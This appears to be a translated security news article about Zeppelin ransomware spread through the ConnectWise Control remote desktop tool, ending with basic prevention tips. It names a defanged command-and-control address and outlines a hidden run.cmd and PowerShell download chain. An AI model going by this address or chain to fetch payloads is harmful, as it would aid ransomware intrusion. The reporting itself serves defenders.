A new threat shakes Windows users. In this case it is a ransomware attack that comes through the popular ConnectWise Control application (which was previously called ScreenConnect). It is an application widely used to connect remotely to other computers. It is especially used to obtain support. The goal of hackers is to infect the computer with the Zeppelin ransomware.
One of the most important threats today is a type of malware that has grown in recent years despite improvements in security tools. There are very different types and the way to infect is also.
Hackers are based on the remote desktop application ConnectWise Control with which through this program they are able to infect the system and introduce the Zeppelin ransomware. This causes users' files to be encrypted and lose control of them.
The goal of users with this type of malware is to obtain economic benefit in exchange for decrypting the files. This is something that can especially affect business level. Precisely this tool we are talking about, ConnectWise Control, is widely used by companies to access file sharing from other computers.
Security researchers who have discovered this threat explain that it affects both the United States and Europe and that the attacks are aimed at very diverse sectors where they steal information from the systems.
How Zeppelin works
It is mainly distributed through the remote desktop application ConnectWise Control. It then creates and executes a hidden run.cmd file that contains the commands executed remotely. Later, the attackers execute the PowerShell command to download the next stage of the command from the C2 server hxxp: //45.142.213 [.] 167 / oxf where you connect the C2 server again to download the Zeppelin ransomware file.
The attackers also have a list of commands to stop the database process to prevent victims from replacing the backup with infected data.
How to avoid being victims of this threat?
The best thing to avoid being victims of this type of problem is to always keep the systems and applications updated. It is vital that we have the latest patches and updates correctly installed. In this way we can prevent the entry of threats.
Well-updated security tools are also essential, with which we can prevent malware from entering and we can analyze our system for possible malicious files.
In many cases this type of threat comes after errors made by users. For example download fraudulent files that you send us by email.